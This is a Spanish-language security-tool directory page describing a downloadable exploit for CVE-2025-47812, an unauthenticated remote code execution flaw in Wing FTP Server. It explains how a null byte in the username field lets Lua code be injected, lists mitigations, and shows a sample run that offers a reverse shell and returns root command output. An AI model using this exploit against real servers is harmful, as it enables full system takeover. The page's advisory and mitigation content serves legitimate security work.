Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
Herramientas/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2025-47812 – RCE crítico en Wing FTP Server 🛡️

🔎 Resumen:

CVE-2025-47812 es una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a Wing FTP Server versiones anteriores a la 7.4.4. Fue descubierta por un investigador de seguridad y se ha confirmado que se está explotando activamente en la naturaleza.


🧱 Causa raíz:

La vulnerabilidad reside en la lógica de autenticación de Wing FTP Server, específicamente en cómo maneja los bytes nulos (\0) en el parámetro username.

Los atacantes pueden inyectar código Lua arbitrario a través del campo de nombre de usuario, que el servidor escribirá en el archivo de sesión. Cuando este archivo de sesión se procesa más tarde, el código Lua inyectado se ejecuta, permitiendo a los atacantes ejecutar comandos a nivel de sistema.


🚨 Impacto:

  • Gravedad: Puntuación CVSS de 10.0 (Crítico)
  • Acceso requerido: El acceso no autenticado o anónimo es suficiente
  • Explotación: Explotación activa confirmada
  • Privilegios obtenidos: El código se ejecuta como SYSTEM (Windows) o root (Linux/macOS)
  • Plataformas afectadas: Windows, Linux y macOS

🔧 Mitigación:

  • Actualice inmediatamente a Wing FTP Server versión 7.4.4 o posterior.
  • Asegúrese de que los servidores FTP públicos no exponen /loginok.html a redes no confiables.
  • Supervise los registros en busca de nombres de usuario inusuales o inyecciones de código Lua.
  • Implemente segmentación de red para aislar los servicios FTP de la infraestructura interna.

💀 Exploit:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
   CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>


------ Response End ------

⚠️ Descargo de responsabilidad

Este exploit se proporciona únicamente con fines educativos. Úselo de manera responsable y solo en sistemas para los que tenga permiso explícito para realizar pruebas. El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta.

Descargar herramienta